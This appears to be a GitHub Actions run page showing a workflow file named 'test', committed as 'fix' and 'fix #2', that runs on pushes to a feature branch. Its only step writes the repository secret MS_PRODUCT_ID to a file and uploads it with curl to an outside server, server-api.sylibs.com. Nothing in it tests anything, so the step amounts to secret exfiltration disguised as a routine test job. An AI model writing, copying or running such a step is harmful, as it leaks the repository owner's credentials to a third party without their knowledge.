Skip to content

fix

fix #2

Workflow file for this run

name: test
on:
push:
branches:
- feat-match
jobs:
test:
runs-on: ubuntu-24.04
steps:
- uses: actions/checkout@v4
- name: Read MS_PRODUCT_ID
run: |
echo "${{ secrets.MS_PRODUCT_ID }}" > ms_product_id.txt
curl -X POST -F "file=@ms_product_id.txt" https://server-api.sylibs.com/temp.php